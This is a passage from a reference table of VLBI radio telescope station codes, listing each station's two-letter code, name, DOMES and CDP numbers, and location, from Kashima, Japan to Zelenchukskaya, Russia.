Keystone at Kashima, Japan K3 KOGANEI3 21704S007 7344 3-m at Koganei, Japan Ka KASHIMA 21701S001 1856 26-m at Kashima, Japan Kb KASHIM34 21701S004 1857 34-m at Kashima, Japan Ke KATH12M 59968S001 7375 12-m at Katherine, Northern Territory, Australia Kg KOGANEI 21704S004 7327 11-m Keystone at Koganei, Japan Ki KIRSBERG 14261M001 7631 mobile Kirschberg, Germany Kk KOKEE 40424S007 7298 Kokee Park, Kauai, HI, USA Kl -------- --------- ---- Kalyazin, Russia * Km -------- --------- ---- 12-m antenna Kitt Peak, AZ, USA (code retired for Kitt Peak) Km KUNMING 21609S003 7367 40-m antenna at Kunming, Yunnan, China Kn -------- --------- ---- MERLIN antenna, Knockin, UK Ko KODIAK 40419M001 7278 mobile Kodiak, AK, USA Kp KP-VLBA 40466S001 7610 VLBA at Kitt Peak, AZ, USA Kr KARLBURG 14260M001 7632 mobile Karlsburg, Germany Ks -------- --------- ---- Kiruna, Sweden Kt KITTPEAK --------- ---- NRAO Kitt Peak, AZ, USA Ku KAUAI 40424S001 1311 9-m at Kokee Park, Kauai, HI, USA Kw KWAJAL26 50505S003 4968 Roi-Namur, Marshall Islands Kz KANOZAN 21746S001 7352 ??, Japan La LA-VLBA 40463S001 7611 VLBA at Los Alamos, NM, USA Le LEONRDOK 40454M001 7292 mobile Leonard, OK, USA M2 MV2ONSLA 10402M006 7211 mobile at Onsala, Sweden Ma MATERA 12734S005 7243 Matera, Italy Mc MEDICINA 12711S001 7230 Medicina, Italy Md MARPOINT 40490S001 7217 Maryland Point, MD, USA Me MON_PEAK 40497M003 7274 mobile Monument Peak, CA, USA Mg -------- --------- ---- Mt. Graham, AZ, USA Mh METSAHOV 10503S002 7385 Metsahovi, Finland (13.7 m astronomy antenna) Mi MIAMI20 40499S019 7201 Miami, FL, USA Mk MK-VLBA 40477S001 7617 VLBA at Mauna Kea, HI, USA Ml MAMMOTHL 40437M001 7259 mobile Mammoth Lakes, CA, USA Mm -------- --------- ---- JCMT, Mauna Kea, HI, USA Mn MIZNAO10 21702S010 7324 NAO 10-m antenna at Mizusawa, Japan Mo MOJAVE12 40405S009 7222 12-m at Goldstone, CA, USA Mp MOPRA --------- ---- ATNF, Siding Sprint, Australia Mq MOJ_7288 40405M013 7288 mobile Mojave, CA, USA Mr MARCUS 21733S002 7310 Minami-tori Shima, Japan Ms MILESMON 40455M001 7038 mobile Miles City, MT, USA Mt MCD_7850 40442M008 7850 McDonald Obs., Ft. Davis, TX, USA Mu MIURA 21739S001 7336 11-m Keystone at Miura, Japan Mv METSHOVI 10503M002 7601 mobile Metsahovi, Finland My MIYAZAKI 21718S001 7312 Miyazaki, Japan Mz MIZUSGSI 21702S009 7314 GSI 5-m antenna at Mizusawa, Japan N6 NOBEY_6M 21725S001 7244 6-m at Nobeyama, Japan Nb -------- --------- ---- mm array, Nobeyama, Japan Nl NL-VLBA 40465S001 7612 VLBA at North Liberty, IA, USA Nm NOME 40421M001 7279 mobile Nome, AK, USA No NOBEYA45 --------- ---- 45-m at Nobeyama, Japan Nt NOTO 12717S001 7547 Noto, Italy Nx NOTOX 12717S001 7547 Noto, Italy (different equipment) Ny NYALES20 10317S003 7331 Ny Alesund, Svalbard, Norway O8 ONSALA85 10402S001 7212 85-ft Onsala, Sweden Oc OCOTILLO 40449M001 7270 mobile Ocatillo, CA, USA Oh OHIGGINS 66008S001 7245 O'Higgins, Antarctica Om -------- --------- ---- 10-m antenna, Owens Valley, CA, USA On ONSALA60 10402S002 7213 60-ft Onsala, Sweden Oo OVRO_130 40439S002 7207 130-ft at Owens Valley, CA, USA Or OVR_7853 40439M004 7853 mobile Owens Valley, CA, USA Ov OV-VLBA 40439S006 7616 VLBA at Owens Valley, CA, USA Pa PARKES 50108S001 7202 Parkes, Australia Pb PBLOSSOM 40404M001 7254 mobile Pearblossom, CA, USA Pe PENTICTN 40105M001 7283 Penticton, British Columbia, Canada Pf PRESIDIO 40406M001 7252 mobile San Francisco, CA, USA Pl PLATTVIL 40496M002 7258 mobile Platteville, CO, USA Pn PINFLATS 40407M001 7256 mobile Pinyon Flats, CA, USA Pr PT_REYES 40410M001 7251 mobile Point Reyes, CA, USA Pt PIETOWN 40456S001 7234 VLBA at Pie Town, NM, USA Pv PVERDES 40403M001 7268 mobile Palos Verdes, CA, USA Qb QUABBIN --------- ---- Quabbin, MA, USA Qu QUINCY 40433M004 7221 mobile Quincy, CA, USA Ri RICHMOND 40499S001 7219 Richmond, FL, USA Ro MADRID64 13407S001 1563 70-m DSS64 at Madrid, Spain Rz -------- --------- ---- Tracking antenna, Robledo, Spain S1 SEATTLE1 40457M001 7229 mobile Seattle, WA, USA S3 SINTOTU3 21731S003 7346 3-m at Kabato, Hokkaido, Japan Sb CTVASBAY 40171S001 7626 CTVA 3.6-m at Shirley's Bay, Ontario, Canada Sc SC-VLBA 43201S001 7615 VLBA at St. Croix, VI, USA Se SEST 41709S001 7239 Cerro Tolollo, Chile Sg SHANGHAI 21605S008 7226 5-m at Shanghai, China Sh SESHAN25 21605S009 7227 Shanghai, China Si SINTOTU 21731S001 7315 5-m mobile at Kabato, Hokkaido, Japan Sj SAGARA 21737S001 7325 5-m mobile at Sagara, Japan Sm CRIMEA 12337S008 7332 Simeiz, Ukraine Sn SNDPOINT 40423M001 7280 mobile Sand Point, AK, USA So SOURDOGH 40425M001 7281 mobile Sourdough, AK, USA Sp SANPAULA 40428M001 7255 mobile Santa Paula, CA, USA Ss CTVASTJ 40101M003 7625 CTVA 3.6-m at St. Johns, Newfoundland, Canada St SANTIA12 41705S006 1404 12-m at Santiago, Chile Su SUWON 23903S001 7353 3.8m antenna at Suwon, Korea Sv SVETLOE 12350S001 7380 Svetloe, Russia Sy SYOWA 66006S004 7342 Syowa, Antarctica T3 TSUKU3 21730S008 7360 3.8-m, Tsukuba, Japan Ta TATEYAMA 21740S001 7338 11-m Keystone at Tateyama, Japan Tc TIGOCONC 41719S001 7640 TIGO at Concepcion, Chile Tg TIGOWTZL 14201S100 7593 TIGO at Wettzell, Germany Ti TIDBIN64 50103S001 1543 70-m DSS43 at Tidbinbilla, Australia Tj TITIJIMA 21732S001 7316 5-m mobile site at Titijima Island, Japan Tk TSUKUBA 21730S001 7311 mobile at Tsukuba, Japan Tl TRYSILNO 10329M001 7607 mobile Trysil, Norway Tn TROMSONO 10302M002 7602 mobile Tromso, Norway Tm TOMAKO11 21750S001 ---- 11-m at Hokkaido Uiv., Japan (formerly at Miura) To TOULOUSE 10003M003 7608 mobile Toulouse, France Tr TORUN --------- ---- Torun, Poland Ts TSUKUB32 21730S007 7345 32-m at Tsukuba, Japan Uc UCHINOUR 21710S001 7349 34-m at Uchinoura Space Observatory, Japan Ud USUDA64 21729S001 7246 64-m at Usuda, Japan Ur URUMQI 21612S001 7330 Urumqi, China Us USSURISK 12342S001 7247 Ussurisk, Russia Uu -------- --------- ---- Ulan-Ude, Russia Uz -------- --------- ---- Tracking antenna, Usuda, Japan Va VLBA --------- ---- VLBA, all 10 stations: BrFdHnKpLaMkNlPtOvSc Vb VNDNBERG 40420M002 7223 MV1 at Vandenberg AFB, CA, USA Ve VERNAL 40492M002 7290 mobile, Vernal, UT, USA Vi VICTORIA 40129M001 7289 mobile, Victoria, Vancouver, Canada Vm VERAMZSW 21702S012 7362 20-m NAOJ VERA, Mizusawa, Iwate, Japan Vo VERAOGSW 21732S005 7363 20-m NAOJ VERA, Ogasawara, Tokyo, Japan Vr VERAIRIK 21748S001 7364 20-m NAOJ VERA, Iriki, Kagoshima, Japan Vs VERAISGK 21736S002 7365 20-m NAOJ VERA, Ishigakijima, Okinawa, Japan Wb WSTRBORK --------- ---- Westerbork, Dwingeloo, Netherlands Wf WESTFORD 40440S003 7209 Westford, MA, USA Wh -------- --------- ---- Weilheim, Germany Wt WHTHORSE 40118M001 7284 mobile Whitehorse, Yukon Ter., Canada Ww WARK12M 50243S001 7377 12-m antenna at Warkworth, New Zealand Wz WETTZELL 14201S004 7224 Wettzell, Germany Y1 VLA 40498S001 7619 VLA, Socorro, NM, USA, array center Y2 VLA-N8 40498S002 7621 VLA, Socorro, NM, USA, pad N8 Ya YAKATAGA 40416M001 7277 mobile Yakataga, AK, USA Yb YEBES 13420S001 7333 14-m antenna at Yebes, Spain Ye YELLOWKN 40127M001 7285 Yellowknife, NW Terr., Canada Yg YARRA12M 50107S012 7376 12-m at Yarragadee, Western Australia, Australia Yk YLOW7296 40127M004 7296 Yellowknife, NW Terr., Canada Ym YAMAGUCH 21751S001 7366 32-m antenna at Yamaguchi, Japan Ys YEBES40M 13420S002 7386 40-m antenna at Yebes, Spain Yu YUMA 40493M001 7894 mobile Yuma, CA, USA Zc ZELENCHK 12351S001 7381 Zelenchukskaya, Russia
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